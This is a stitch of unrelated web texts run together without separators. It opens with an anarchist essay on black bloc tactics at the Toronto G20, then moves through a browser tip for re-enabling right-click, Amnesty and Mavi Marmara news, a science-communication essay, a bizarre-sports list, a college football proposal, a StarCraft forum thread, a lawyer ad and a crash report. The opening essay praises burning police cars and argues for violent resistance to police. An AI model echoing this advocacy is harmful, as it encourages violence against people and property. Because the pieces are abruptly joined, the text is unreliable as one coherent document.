And if the cops are going to use black bloc tactics to crush peaceful protests they normally could n't because of societal democratic values , would n't that mean that a black bloc or some kind of force like it is needed to fight back against the police and their state , since they wo n't allow us to even protest peacefully ?
To bolster her Toronto conspiracy theory , Rebick bring up the Montebello incident where masked cop infiltrators were exposed and the cops admitted the infiltration .
She neglects to mention that it was the real black blocers who exposed the cops , not the union leader who could n't understand the word “ police ” in French .
She also , of course , does n't bring up this year 's March 15th anti-police demonstration in Montreal , where masked police attempting to infiltrate the demo were physically attacked and driven out .
Rebick uses the term “ agent provocateur ” , as others have .
But do the cops really need to “ provoke ” the black bloc or others into burning cop cars or smashing corporate windows ?
You can't provoke a group to do what it is already doing and wants to be doing .
You can only provoke people into doing what they would n't otherwise do .
This is what the cops are concerned with most of all about the black bloc .
That the bloc will inspire others who would like to riot but who feel isolated and unable to .
That the black bloc will “ provoke ” others into doing what they already want to , joining in the fun .
And we could n't expect Rebick to mention how peaceful or non-black - bloc activist groups have been proven to have been infiltrated by cops as well , even more easily than the black bloc .
But the police are not all - powerful , as Rebick implies .
They could n't completely control the G20 protests , just as they could n't totally control the Queen 's Park riot or the 1992 Yonge Street riot or the black bloc at the Vancouver Olympics in February of this year .
This is neither shocking nor a surprise .
They must and did allow many peaceful protests against the G20 prior to the rioting , because they are paid to uphold a democratic state that allows for peaceful protest so long as it does not interfere too much with business as usual .
They also work hard to prevent black bloc activity and to crush it wherever possible .
The cops certainly use the black bloc as an excuse to do mass arrests and quell peaceful protests , but they also are trying to disperse crowds and take away any cover for possible black bloc activities , as well as give the appearance that they are back in control of things .
Again , if the cops can use unfounded excuses to round up the peaceful , that means not - so - peaceful methods are needed to fight back and overcome the repression rather than concede to it or say that we should never fight back so that we can always protest .
Protest is useful if it supports social movements and direct action .
It is useless if it cowers at ever going beyond voicing dissent to making concrete changes because the police wo n't allow it .
The video evidence of the cop car attacks in Toronto clearly shows that Rebick is either ignorant of the circumstances she speaks of or is lying .
Either way , it appears that the reality of many people , black bloc and otherwise , finding joy in the trashing , burning and mocking of police vehicles is an inconvenient truth for her .
Rarely has a conspiracy theory been so quickly and incontrovertibly debunked .
It could be considered quite ridiculous to think that the cops and the corporations wanted their property trashed and that the city and Canada preferred the image of rebellion in the streets , of a city out - of - control .
One of the main purposes , if not the main purpose of the G20 , is mere propaganda , an image of control , of the best of all possible worlds .
Most of the important decisions are already made elsewhere .
We all know that the G20 was an inside job .
And maybe the black bloc really are shape - shifting alien lizards from a secret civilization on the moon .
But maybe we should use the time - honoured principle of sticking with the simplest answer rather than the most complicated and outlandish one .
Cops harass , hurt and murder lots of people daily .
So lots of people would like to see their cars go up in smoke .
Cops are n't all - knowing , all - powerful and all - controlling and are n't used to people challenging their authority .
Not so shocking now is it ?
Socialize :
Join the Media Co-op today .
Want more grassroots coverage ?
1720 words
How to : Enable right clicks if disabled on web pages
Today I was on WordPress ’s support forum looking at some thread when I came a cross a thread where OP is asking for a support and site reviewing .
First thing I noticed was that there ’s not any title for the home page , Hmm …
That ’s when I made a right - click to see the page source and this error message poped up to me .
“ This Site Is Protected By A A$ $ - Kicking Security System That Will Kick Your A$ $ ”
Srsly ?
WTF ?!
Yes , Copying websites is not cool ; but disabling right click is n’t either .
I know lots of you guys hate that kind of stuff .
How do I enable right clicks then ?
You can easily overcome that kind of “ Security ” by entering the following javascript code in the address bar in your browser
javascript:void( document.oncontextmenu=null )
Like in this image
Hit Enter and you ’re done ;
Right clicks are now back on .
Bonus tricks :
1. In Firefox browser , Go to : Tools -> Options -> Content ->
Advanced Javascript settings ->
Then choose to enable or disable context menu .
2 . Hold down the right mouse button
The error message will appear , Hit Enter .
( Without releasing the mouse button , You ’re still holding it down )
Once you hit enter , the message will disappear .
Now you can release the right - click and the it ’ll work 😉
[ ad#bottom ]
Image caption Refugee camps have long been a fixture in north - western Pakistan
Millions of Pakistanis live in a " human rights - free zone " in the country 's north - west , Amnesty International says .
Residents of tribal areas face Taliban abuse and get no protection from the government , the rights group alleges .
In a report , it says the Taliban secured their rule by killing elders and torturing teachers and aid workers .
A Pakistani foreign office spokesman rejected Amnesty 's findings , saying his government was " fully committed " to improving human rights in tribal areas .
Displaced
" We are not denying that there are problems there , " spokesman Abdul Basit told reporters in Islamabad , but he said the government was " sparing no effort " to ensure people 's rights were protected .
The 130 - page Amnesty report , As if Hell Fell on Me , was based on nearly 300 interviews with residents of the Federally Administered Tribal Areas ( Fata ) and the surrounding areas .
It says more than a million people have been displaced by fighting between the Pakistani military and the Taliban in tribal areas bordering Afghanistan .
The report also says available information suggests that at least 1,300 people were killed in the conflict during 2009 .
" Nearly four million people are effectively living under the Taliban in north - west Pakistan without rule of law and effectively abandoned by the Pakistani government , " said Claudio Cordone , Amnesty 's interim secretary general .
The report quotes a teacher , who fled the Swat valley with his family in March 2009 , describing how the Taliban operated .
" [ The Taliban ] took over my school and started to teach children about how to fight in Afghanistan .
They kicked out the girls from school , told the men to grow their beards , threatened anybody they did n't like . "
The teacher said the government failed to protect them .
" What 's the point of having this huge army if it can't even protect us against a group of brutal fanatics ? "
Last year the Pakistani army declared the Swat valley to be free of militants after completing an anti-Taliban operation in and around Mingora , the main city in the valley .
Pakistani military spokesman Athar Abbas dismissed the report , describing it as " factually incorrect " .
He said that tribal elders supported the army 's action to bring stability , particularly to the Swat region .
" Local journalists as well as foreign journalists who have been visiting Swat , talking to the people , the elders , the notables , the locals there , they have endorsed the contribution of the military in bringing normalcy and protecting the people , " he told the BBC .
Amnesty has documented what many civilians in north - west Pakistan have often been scared to openly say , the BBC's Aleem Maqbool reports from Islamabad .
The report talks of systematic human rights abuses by the Taliban and accuses militants of increasing the likelihood of civilian casualties by dispersing themselves among civilians during clashes with government forces .
But it also accuses the Pakistani army of not doing enough to avoid civilian casualties in its operations against militants , and the government of neglecting the basic needs of the millions of people living in the frontier regions close to Afghanistan .
Deal with that , Amnesty says , and many of the conditions that have led to the considerable unrest in these areas , would be removed .
The group has appealed to both the Taliban and the Pakistani government to end human rights abuses in north - west Pakistan .
It has also called on Islamabad to reform the Pakistani constitution , which excludes the Fata from the legal and parliamentary system of the country .
In Depth › Analysis and Opinion
Trust me , I 'm a scientist
Scientists need to open up their ivory towers and make science part of everyday life if they want the public to trust the science behind issues such as GM food and climate change , argues Baroness Susan Greenfield .
In the 18th century , science and the arts were intertwined .
No one distinguished between the science from the arts , you were just a learned person interested in natural philosophy and natural history .
For example , poets like Wordsworth and Coleridge had a great interest in science and vice versa .
But in the 20th century when science became so technical and technological that it required a certain level of background knowledge in order to get to first base , the arts and science diverged as separate disciplines .
In his book , The Two Cultures , CP Snow observed that while scientists were expected to know who Shakespeare was , artists were quite proud to say they knew nothing about science .
Science was completely overlooked in everyday life until the late seventies when Richard Dawkins wrote The Selfish Gene , one of the first popular science books that raised an interesting question .
Then there was this happy period when people started to discover science again , rather like the Victorian times when people second - hand discovered travel , where it was good enough to read a travel book even though you could n't do it yourself .
But now science is mainstream and central to our society .
As a result , attitudes have changed from the casual curiosity of the recreational reader to the basic concern of the 21st century citizen .
The public has become wary of scientists : they are now cynical about things like GM food and Frankenstein sciences and they 're frustrated because scientists do n't really give them clear answers to questions such as : does MMR cause autism ?
Or do mobile phones cause cancer ?
There is an uneasy standoff between the press , scientists and the general public .
Scientists , in general , are not all committed to talking to the general public .
Many still think it 's dumbing down , they think it 's talking to people who are not good at research , they think it 's not going to get them anywhere there 's no point in doing it .
But they have to come out of the ivory tower .
They have to realise they 're living in an age that 's not like the 1970s when you could be locked away in your university and you could talk to each other about the grants you 've got and evaluate each others papers and people would let you get on with it .
That 's changed .
Now there 's much less money around , the taxpayer is paying and you actually owe it to them to explain what you are doing with their money .
The public deserve informed information that they can think about and go away and view .
^ to top
Science can't prove a negative
Journalists do n't necessarily , and scientists do n't help them , convey what science can and can't deliver , what it can and ca n't do .
For example .
science can't prove a negative .
If you say to me : " Do mobile phones give me brain tumours ? "
The fact that there 's no evidence means that all I can say is that there is no evidence it does .
I can't say categorically say " No " because all science is provisional , it depends on the latest review , the latest report .
So all I can say is : " As far as we know " or " Up until now " , or " This study shows that " .
But of course the general public finds that very frustrating , as do journalists , because scientists are very leery about just saying " Yes " or " No about something .
Therefore they come across as being rather hesitant and uncertain and sometimes , some might say not particularly bright , because they seem not to know the answer .
The public feel dismayed and worried that people who lead the technology seem to be uncertain .
But we can get around that by trying to explain how science is done and what scientists can do and what they can't do .
We need to be much more on the front foot before a major story like MMR , GM foods or mobile phones breaks .
If people are aware of the agenda of scientists and how they do their jobs then when a story does break you can put it into context .
I 'd like to see scientists on chat shows , where instead of seeing celebrities you have scientists come on and not only tell us about their latest finding but also about the struggle they had , how they came across this idea , whether they had enough funding , and what happened on the day the equipment broke down .
Or the day they were proved wrong — everyone has that happen to them in life generally not just scientists .
It would also give the chance to show the public that you can't prove that something is n't the case , you can only prove something is the case .
The more the public see scientists in chat shows or soap operas , the more they share and identify with science either second - hand , or through fiction or the media , the more they 'll realise that scientists are normal people .
We can't afford to separate science from the rest of our lives in a world dominated by climate change and GM foods and a whole host of pervasive and invasive technologies such as artificial life .
We need at least some of the next generation who are trained in law and medicine , politics and the media and in the private sector to be scientifically literate as well .
We need people with a strong science background in all sectors and walks of life .
As Carl Sagen said : " It 's suicide to live in a world that depends upon science and technology that virtually no one knows anything about . "
Baroness Susan Greenfield is a professor of pharmacology and physiology at Oxford University .
A leading expert in neurochemistry , she has written seven books and is passionate about communicating science .
She was recently in Australia for the Australian Society of Medical Research 's medical research week .
^ to top
The captain and first mate of the Mavi Marmara , the ship which led the Gaza flotilla raided by Israel Defense Forces special forces last week , had attempted to prevent premeditated violent clashes between activists and the Israeli military , evidence released Friday showed .
Late last month , Israeli commandos rappelled onto the deck of one of the ships trying to break Israel 's three - year - old blockade of Gaza .
The soldiers were intercepted by a crowd of activists , setting off a clash that killed nine men - eight Turks and a Turkish American .
Israel says its soldiers began shooting only after a mob of pro-Palestinian activists attacked them - a version backed up by video footage released by the army .
But the activists and their supporters say Israeli commandos needlessly opened fire .
According to the clip , released by the Intelligence and Terrorism Information Center , the ship 's captain Mehmut Tuval had attempted to prevent a violent altercation by disposing of metal bars and chains IHH activists had cut ahead of the IDF takeover .
Mehmut said that " once we see that the boats [ were ] around usactually not us , but around the total shipsabout two hours [ before the takeover ]
I see they were cutting the steelschains .
And I said to the chief officer , he collected all of them and also we put it in the radio room in the bridge . "
The captain also indicated that he had thrown some of the bars and chains into the sea , while adding that he also asked IHH activists to pass over the bars and chains that had collected later on .
Tuval said he sent his chief officer to ask for the bars , " saying he cannot take directly from the guys .. he spoke with the IHH to collect the [ steel bars and chains ] we asked them to drop them , drop in the sea , because if they take it from the bridge that 's when we have a problemand [ after that ] we did n't see any in their hands . "
The Mavi Marmara captain said he was indeed worried that the presence of the makeshift weapons would worsen the situations , adding he thought that nothing would eventually happen since the IHH commanders were at hand to prevent any violence .
" I was worried but if their [ leader ] on the ship that there would be no effect , nobody will fight I said many of times because I know the end , " Tuval told investigators , adding that he thought that nothing would happen since there were civilians on the ship /
" I worried [ that 's ] why I collected the things to the bridge and I take how many I see in their hands and I drop them in the sea . "
Asked whether or not he knew if the IHH activists were preparing a violent welcome to the IDF takeover , Tuval said that " they were preparing to violence against the soldiers : Yeah from what I was informed . "
The ship 's first officer , Gokkiran Gokhan , told his investigators that he was sent by the ship 's captain to look into an unusual commotion near the life - boat section of the Mavi Marmara .
Once he got there , Gokhan had noticed that bars and chains had been cut off by IHH activists from the deck using rotary saws , which he claims were no part of the ship 's equipment .
Asked whose equipment were they , the first officer said : " I do n't know , not the ship's .
There is no such equipment on the ship .
The deck has rods with hooks for chains , and when I got there the rods had been cut . "
Gokhan added that this had happened after dark , and when he had asked one of the activists who had cut the rods , he answered that he did n't know .
The first officer also said that the IHH activists did not allow anyone but members of their group to pass through their section of the ship .
When asked how the IHH activists communicated with each other , Gokhan told his investigators that " they brought walkie - talkies along with them when they got on board in Istanbul .
The radios were distributed to the IHH people and to the ship 's crew . "
The first mate added that other non-IHH passengers were allowed to move freely , with the exception of the control center which was located above the ship 's bridge , saying that the IHH group was made up of 40 people who boarded the ship in Istanbul .
The federal government needs to justify why the defence force used radioactive material during training exercises in Sydney , NSW Greens MP Lee Rhiannon says .
The Australian Defence Force ( ADF ) said it used a " small radioactive training source " during war games across Sydney between April 27 and May 29 .
It said the exercises involved the ADF , US forces , Australian Federal Police and NSW police .
The exercises were based on tracking weapons of mass destruction , it said .
" At no time during this exercise was any danger posed to the general public , " the ADF said in a statement on Friday .
Believe it or not , we have n’t previously entitled a list “ top 10 bizarre sports ” !
However , we do have two previous lists that look at bizarre sporting and leisure events .
This list looks at another bunch of things people do to pass the time ; in common , they all share one thing : extreme weirdness .
This list is largely composed of items mentioned by the readers of the previous two lists .
10 Canine Freestyle
http://www.youtube.com/watch?v=crmD_B8ERzk
Technically it is n’t a sport , but you really need to see this – it is weird .
Musical canine freestyle — also known as musical freestyle , freestyle dance , and canine freestyle — is a modern dog sport that is a mixture of obedience , tricks , and dance that allows for creative interaction between dogs and their owners .
There are two types , musical freestyle and freestyle heeling ( also known as heelwork to music ) , the main difference being that freestyle heeling focuses on a dog ’s ability to stay in variations of the heel position while the handler moves to music , whereas musical freestyle demands that the dog perform a variety of tricks and other obedience talents , and places a greater focus on the trainer ’s dance abilities and creativity .
9 Swamp Soccer
Swamp Soccer is a form of association football that is played in bogs or swamps .
The sport is said to come from Bishop Auckland , in the north east of England , where it initially was used as an exercise activity for athletes and soldiers , since playing on soft bog is physically demanding .
However the first organized championship was the 1998 Finnish championship and was the brainchild of Jyrki Väänänen , nicknamed “ The Swamp Baron ” , when the creator of swamp football moved there .
There are currently an estimated 260 swamp football teams around the world .
At the swamp football world championship games of 2005 , some 5,000 players participated .
8 Tractor Pulling
Truck and tractor pulling , also known as power pulling , is a competition using tractors and large trucks to pull a heavy sled ( sledge ) along a ‘ track ’ and is very popular in rural areas .
Usually the sled offers progressively greater resistance as it is pulled .
It can be a great spectacle , although the pulling vehicle produces a great deal of noise and smoke , and tends to kick up dirt .
Also , the tractors pulling do n’t actually travel very far ( a typical “ full pull ” is 300 feet ( 100 metres ) ) .
There are many different classes , from “ factory ” tractors , to custom built vehicles ( modified ) with multiple engines .
7 Bun Climbing
Each spring , tens of thousands of Hong Kong residents and visitors swarm the minuscule fishing island of Cheung Chau to witness man vs. bun .
Just outside the Pak Tai temple , 60 - ft. - tall ( 18 m ) bamboo and metal structures are covered in steamed , sweet and blessed buns .
At midnight on the final night of the weeklong festival , in an event known as the Bun Scramble , athletes try their best to scurry up the bun towers and gather more buns than their opponents .
[ Source ]
6 Mountain Unicycle
When I think of unicycle I think of clowns at the circus , not rugged men taking it to some of the most dangerous terrains on earth .
People take a unicycle and ride it on rocky terrain .
Unicycles are one of the hardest things to ride , right next to the pogo stick .
This is just a sport of pure insanity but it has gotten national coverage on major news channels like FOX .
As you can see from the video above , this is not a particularly graceful sport .
5 Chess Boxing
Two words you never thought you would see together .
Chess Boxing is a sport for nerds .
It involves a two minute boxing round with a four minute chess competition .
There is even a governing body , it ’s called the “ World Chess Boxing Association ” and their motto is “ Fighting is done in the ring , but war is waged on the board . ”
4 Punkin Chunkin
Punkin chunkin is the action of hurling a pumpkin , in a competition , by mechanical means over distances greater than those of other competitors .
Pumpkin chucking competitions , formal and informal , exist throughout the United States in the autumn , when pumpkins are harvested .
In order of increasing effectiveness , the devices include compound slingshots , catapults , trebuchets , and pneumatic air cannons .
A pneumatic air cannon named Young Glory III holds the current world record by firing a pumpkin a record 4483.51 feet ( 1,351 meters ) during the annual 2008 competition in Delaware .
As you can tell from the video above , this is not a particularly interesting spectator sport !
3 Outhouse Racing
Mackinaw City actually hosts a series of outhouse races every year .
The event is billed as “ The Best Case of the Runs You ’ll Ever Have ” by Greg “ Big G ” Yoder , who first commissioned the event .
The rules require each racing outhouse to contain a toilet seat and a toilet paper dispenser .
There can be only two pushers , two pullers and one rider per outhouse , which is mounted on skis .
2 Air Sex
Air sex is a performance activity invented in Japan ; clothed men simulate sexual activity with an invisible partner , often in an exaggerated manner , set to music , and in a competition before an audience .
This is somewhat akin to playing air guitar , explaining the name .
The creator , J - Taro Sugisaku , says that it was invented in Tokyo in 2006 by a group of bored men without girlfriends .
The reigning “ world champion ” in air sex goes by the name of Cobra .
1 Mind Ball
Mindball is a two person game controlled by players ’ brain waves in which players compete to control a ball ’s movement across a table by becoming more relaxed and focused .
Mindball is produced by the Swedish Company Interactive Productline .
The concept , introduced in 2005 , originates from the prototype Brainball which was developed by the Smart Studio at The Interactive Institute , also in Sweden .
If you found that video interesting , here is another one I found of grass growing .
Spy cam vid leads to nanny 's arrest for child abuse
Note : to turn off these warnings you need to set the ' safe mode ' to OFF ( on the top right )
With all the expansion talk the last few months finally reaching a head this week , it now seems the college football world is in a state of full chaos and anarchy .
Nebraska set the dominoes in motion yesterday when word leaked out that the Cornhuskers will indeed be leaving the Big 12 Conference for the Big Ten .
This could very well mean it's time to start carving the tombstone for the Big 12 , and we should probably start preparing ourselves for more craziness in the coming weeks .
This was only the first move of many to come .
The question I pose is , why the need for so much uncertainty ?
Why bother with all the talk about who 's going where , and fitting there , and which conferences will survive , and so on and so on ?
The landscape of the sport is very much in a shifting phase right now , but when it 's all said and done , will it have shifted in a way that makes the situation a better one overall ?
We all know college football has its problems , but will this move of teams and expansion of conferences actually come any closer to fixing things ?
My thought here is , why speculate on what could happen when I can just state what I feel should happen ?
What I feel we must do to improve college football is simple .
Regionalize it !
Break the country down into four conferences : East , West , Central , and South .
Each conference has 18 teams split up into two divisions of nine .
This allows for the closest thing to a playoff system while also making room for natural area - based rivalries to emerge .
When you get right down to it , college football is a fight for territory just as much as it's a fight for wins .
Most teams in a given part of the country are fighting amongst each other for recruits , publicity space , and other resources as it is .
If you look back at history , you 'll see that the greatest rivalries in the sport ( Ohio State - Michigan , Texas - Texas A&M , Auburn - Alabama , Florida State - Miami , etc. ) all involve teams within close proximity to each other .
It 's that neighboring backyard mentality that brews so much animosity .
Some may say that for the most part , the sport is already regionalized , but is that really the case ?
You can say that the Pac 10 consists of only teams in the West , but when you look at it closely , you have teams like Arizona and Washington separated by 1,500 miles of land .
Can a true rivalry exist amongst teams so distant ?
Can Florida
State benefit in any way from beating a team like Boston College ?
How many Massachusetts recruits do you think the Noles are making pitches to with that victory ?
I believe with this type of geographical plan in place , we can break things down proportionately and open up new doors for crowning a true champion .
The NCAA has it so right when it comes to March Madness for men's basketball .
That yearly bracket is one of the most exciting things in sports .
Only about eight or nine teams may have a true shot , but for most teams in the field , it 's getting to the Final Four that 's the real goal .
A similarly structured plan in place for football allows for the same type of excitement , only it would be spread out throughout a whole season .
Even if a team comes up short of a National Championship , they can still make the claim that they were the Kings of the South or the Beasts of the East that year , just as college basketball players have that shiny Final Four ring to show for the rest of their lives .
Here 's a rough example of how alignment could look with a plan like this .
Eastern Conference
Region I
Boston College Eagles
Connecticut Huskies
Maryland Terrapins
Penn State Nittany Lions
Pittsburgh Panthers
Rutgers Scarlet Knights
Syracuse Orange
Temple Owls
West Virginia Mountaineers
Region II
Cincinnati Bearcats
Duke Blue Devils
Kentucky Wildcats
Louisville Cardinals
NC State Wolfpack
North Carolina Tar Heels
Virginia Cavaliers
Virginia Tech Hokies
Wake Forest Demon Deacons
Southern Conference
Region I
Central Florida Knights
Clemson Tigers
Florida Gators
Florida State Seminoles
Georgia Bulldogs
Georgia Tech Yellow Jackets
Miami Hurricanes
South Carolina Gamecocks
South Florida Bulls
Region II
Alabama Crimson Tide
Arkansas Razorbacks
Auburn Tigers
Baylor Bears
LSU Tigers
Ole Miss Rebels
Mississippi State Bulldogs
Tennessee Volunteers
Vanderbilt Commodores
Central Conference
Region I
Illinois Fighting Illini
Indiana Hoosiers
Michigan Wolverines
Michigan State Spartans
Northwestern Wildcats
Notre Dame Fighting Irish
Ohio State Buckeyes
Purdue Boilermakers
Wisconsin Badgers
Region II
Iowa Hawkeyes
Iowa State Cyclones
Kansas Jayhawks
Kansas State Wildcats
Minnesota Golden Gophers
Missouri Tigers
Nebraska Cornhuskers
Oklahoma Sooners
Oklahoma State Cowboys
Western Conference
Region I
Boise State Broncos
Cal Golden Bears
Oregon Ducks
Oregon State Beavers
Stanford Cardinal
UCLA Bruins
USC Trojans
Washington Huskies
Washington State Cougars
Region II
Arizona Wildcats
Arizona State
BYU Cougars
Colorado Buffaloes
Texas Christian Horned Frogs
Texas Longhorns
Texas A&M Aggies
Texas Tech Red Raiders
Utah Utes
So how would this all work from a scheduling and structure standpoint ?
The 12 - game schedule would still remain .
Each team plays the eight games within their division to determine who is best .
They also play two conference games against teams from the other division , and then two national games against teams from another conference .
These non division games would be useful for tie breakers and would also allow for the continuation of national rivalries ( ex. USC - Notre Dame ) .
Every team would also have one bye week during the season .
At the end of the 13 - week season , the top team in Region I will play the top team in Region II for the Conference Championship during " Championship Saturday . "
It would be a day of conference championship games that would look like this :
12 PM - Eastern Conference Championship
3 PM - Central Conference Championship
6 PM - Southern Conference Championship
9 PM - Western Conference Championship
It would certainly be an exciting day of college football .
The winners of the South , East , West , and Central conferences will be randomly drawn on Selection Sunday ( day after Championship Saturday ) to see who matches up against each other in the " Final Four . "
The " Final Four " will take place on New Year 's Day with the National Championship game to follow a week later .
It 's a formula that somewhat resembles the March Madness bracket without directly ripping off the tournament idea .
It also does n't mean the end of a bowl season either .
Nine teams per conference ( the championship loser as well as the four top teams in each division ) will be eligible for bowls .
That 's 36 teams in total , enough for 18 consolation bowl games to be played in the two - week window leading up to New Years Day .
That means sponsors and the majority of fan bases will still be kept happy .
As you can see , a balanced plan like this does n't really mean a drastic shift of college football as we currently know it , it 's just adding and twisting around a few elements .
Those against it might ask how a team like South Florida is going to be able to compete with a team like Florida .
But when you think about it , is South Florida really at a bigger disadvantage to UF than say a team like Vanderbilt presently is in the SEC ?
The only way that a school like South Florida is going to approach the program level of Florida is by beating the Gators on the field first .
This plan allows for schools in a certain region ( in this example , it 's Florida ) to battle it out on the field for supremacy .
If Florida State beats Miami or South Florida beats Florida , they can use that as a pitch to all the in state kids they recruit .
They have the opportunity to make the claim that they are in fact the best team in the state and results are pretty indisputable .
And what about the other 48 schools currently in the FBS ?
They would have their own subdivision .
It would be similarly structured , four conferences of twelve teams split into two divisions .
There , they would battle it out for their own championship and bragging rights the same way the power conferences would only their Final Four and National Championship would take place before bowl season in early December .
In the end , this is by no means a concrete plan , it 's just an idea I had that could bring some of the energy and enthusiasm of college basketball 's March Madness and mesh it with college football .
You have to remember , though , that there are a lot of variables in the equation of college football and the big one is money !
Everything that happens in the major college sports such as football and men's basketball is based off the financial gain for those involved .
Do n't for a second believe that college football is n't far and away a business first and a sport second .
So we 'll just have to wait and how the checks fall with all this expansion stuff .
Regardless of how it ends up , it 's sure to be an entertaining ride .
This is a photo of a photo displayed above Yoshi’s in San Francisco .
The subject is young , maybe a teenager , dressed in some fancy garb .
By the look on his face he ai n’t f*ckin ’ around .
I ’ll eventually go inside the club and ask somebody , but it would be more rewarding to figure this out through friends .
– Ray
Share this : Twitter
Facebook
Like this : Like Loading ...
Related
Buddhist Profile Joined April 2010 United States 658 Posts Last Edited : 2010-06-03 15:48:51 #
1
I did n't see a thread on this , at least not with real data , so here it is :
Using QXC 's build tester , I very carefully tested whether splitting actually makes a difference .
I assumed it would make some small difference ( as I think most people assume ) , but I was wrong .
I tested 3 split methods .
One method is to have no split , to simply send all 6 workers to mine one patch .
One method is the half split , to send all 6 workers to one patch , then quickly select 3 and send them to a different patch .
The final method tested is the one I use in real games , to quickly press f1 ( select idle worker ) and right click an individual mineral patch , to send each worker to its own patch .
I also tested whether it matters if you build the first worker before or after sending the starting ones to gather .
I used Protoss in every trial , but the race should have no affect what so ever , because no supply buildings are produced .
The rally point was the same at all times for all trials .
I made sure I restarted if I misclicked at all , so that each trial would be within an infinitesimally small margin of error .
No chrono boost is used , because the way you split has no effect on your chrono boosts , and it would just add another margin of error .
The effectiveness of each split is measured by the number of minerals at the 1 minute and 2 minute marks .
+ Show Spoiler +
Original article
If the tables look identical , they should , because they are .
That is no exaggeration , it 's real data I carefully recorded from in - game tests .
Yes , 1 and 2 minutes are n't very far into the game , so maybe the difference could pan out later , but really , considering how precisely equal each method is , I do n't think the split would ever have any affect on any game .
If you are n't seeing even a single extra 5 mineral return after 2 minutes into the game , I do n't think you 'll ever get an advantage large enough to account for even a single unit at any point through a game .
Thoughts ?
edit : Kletus ran some tests of his own :
+ Show Spoiler +
On June 03 2010 07:34 Kletus wrote :
Okay , a couple of things to note :
i ) Speed was slowest throughout the whole 1 min timer ; the timer I used was real - time supplied by the build order tester map VERSION 2.3 .
ii )
This was timed to the second .
By that I mean I stopped looking at the minerals once I saw 1:00 so if an scv was JUST about to put in minerals , he gets cut .
iii )
Race used was terran .
iv ) For F1 split , I started the split from 6th patch from the bottom .
Then just clicked down each patch .
7th scv was placed on the nearest non-occupied patch .
Also , I have noticed a pattern with the F1 selection AI and it can probably be done even more efficiently than just clicking down a line ; will investigate this later .
v ) For half split , I split the scvs to the patches 2nd from the top and 2nd from the bottom .
7th scv was placed on the nearest non-occupied patch .
vi )
For no split , I simply took all my scvs and right - clicked the fifth patch from the bottom , which is the closest and most centered patch on the beta tester map .
7th scv was placed on the nearest non-occupied patch .
These are my findings :
Minerals @ 1min
The difference between half and none is truly negligible .
The difference between F1 and the rest is maybe a couple of milliseconds , just enough for one scv to finish his trip .
Okay , a couple of things to note : i)
Speed was slowest throughout the whole 1 min timer ; the timer I used was real - time supplied by the build order tester map VERSION 2.3.ii )
This was timed to the second .
By that I mean I stopped looking at the minerals once I saw 1:00 so if an scv was JUST about to put in minerals , he gets cut.iii ) Race used was terran.iv )
For F1 split , I started the split from 6th patch from the bottom .
Then just clicked down each patch .
7th scv was placed on the nearest non-occupied patch .
Also , I have noticed a pattern with the F1 selection AI and it can probably be done even more efficiently than just clicking down a line ; will investigate this later .
v )
For half split , I split the scvs to the patches 2nd from the top and 2nd from the bottom .
7th scv was placed on the nearest non-occupied patch.vi )
For no split , I simply took all my scvs and right - clicked the fifth patch from the bottom , which is the closest and most centered patch on the beta tester map .
7th scv was placed on the nearest non-occupied patch .
These are my findings : Minerals @ 1minThe difference between half and none is truly negligible .
The difference between F1 and the rest is maybe a couple of milliseconds , just enough for one scv to finish his trip .
So there is a difference 40 seconds in , but this difference does not increase over time .
So essentially , you get those 5 minerals with a perfect f1 split milliseconds sooner than without , but there is no exponential increase , so you wo n't see that difference in the 1 min or 2 min results .
Also , some people have mentioned ( and I 've stated myself ) that the map matters .
Some maps have obviously split mineral patches that will benefit from worker splits , especially if patches are optimized on the edges and not the middle where you would click for a no - split .
Btw , this thread has nothing to do with BW , or whether or not this is a good thing , it 's just about data .
I do n't think that " requiring " splitting was at all a bad thing for BW , and I also do n't think it 's at all necessary for SC2 , it 's something you 'll only do once a game , and it just is what it is .
Edited because people do n't read past the OP .
I did n't see a thread on this , at least not with real data , so here it is : Using QXC 's build tester , I very carefully tested whether splitting actually makes a difference .
I assumed it would make some small difference ( as I think most people assume ) , but I was wrong .
I tested 3 split methods .
One method is to have no split , to simply send all 6 workers to mine one patch .
One method is the half split , to send all 6 workers to one patch , then quickly select 3 and send them to a different patch .
The final method tested is the one I use in real games , to quickly press f1 ( select idle worker ) and right click an individual mineral patch , to send each worker to its own patch .
I also tested whether it matters if you build the first worker before or after sending the starting ones to gather .
I used Protoss in every trial , but the race should have no affect what so ever , because no supply buildings are produced .
The rally point was the same at all times for all trials .
I made sure I restarted if I misclicked at all , so that each trial would be within an infinitesimally small margin of error .
No chrono boost is used , because the way you split has no effect on your chrono boosts , and it would just add another margin of error .
The effectiveness of each split is measured by the number of minerals at the 1 minute and 2 minute marks .
If the tables look identical , they should , because they are .
That is no exaggeration , it 's real data I carefully recorded from in - game tests .
Yes , 1 and 2 minutes are n't very far into the game , so maybe the difference could pan out later , but really , considering how precisely equal each method is , I do n't think the split would ever have any affect on any game .
If you are n't seeing even a single extra 5 mineral return after 2 minutes into the game , I do n't think you 'll ever get an advantage large enough to account for even a single unit at any point through a game .
Thoughts ?
edit : Kletus ran some tests of his own :
So there is a difference 40 seconds in , but this difference does not increase over time .
So essentially , you get those 5 minerals with a perfect f1 split milliseconds sooner than without , but there is no exponential increase , so you wo n't see that difference in the 1 min or 2 min results .
Also , some people have mentioned ( and I 've stated myself ) that the map matters .
Some maps have obviously split mineral patches that will benefit from worker splits , especially if patches are optimized on the edges and not the middle where you would click for a no -split .
Btw , this thread has nothing to do with BW , or whether or not this is a good thing , it 's just about data .
I do n't think that " requiring " splitting was at all a bad thing for BW , and I also do n't think it 's at all necessary for SC2 , it 's something you 'll only do once a game , and it just is what it is .
Personal Injury Lawyers in Mobile
WORKERS COMPENSATION INJURY ATTORNEYS
The personal injury law firm of Clay , Massey & Associates , P.C. , has been helping injured clients and their families throughout Mobile , Alabama and Baldwin County since 1972 .
When you or a family member suffers a serious car accident , or another injury , in the Mobile , Alabama , area or anywhere along the Gulf Coast , turn to the experienced personal injury attorneys at Clay , Massey & Associates , P.C.
Our three - member attorney team has over 80 years of collective legal experience and we combine the hands - on , results - driven legal service and supportive client services needed when injuries and wrongful death bring difficult changes to families .
If you need the services of professional car accident lawyers , or if you or a family member was injured due to the negligence of another person , call us today locally at 251-433-1000 to schedule a free initial consultation .
Image caption Georgina Mills admitted killing Simon Evans on the A30
A driver who was distracted by a spider ended up killing a cyclist and badly injuring another when she took her eyes off the road to throw the creature out .
Simon Evans , 37 , from Derby , was on a charity bike ride when he died in the crash on the A30 in Devon in September .
Georgina Mills , of Okehampton , Devon , admitted causing death by dangerous driving at Exeter Crown Court .
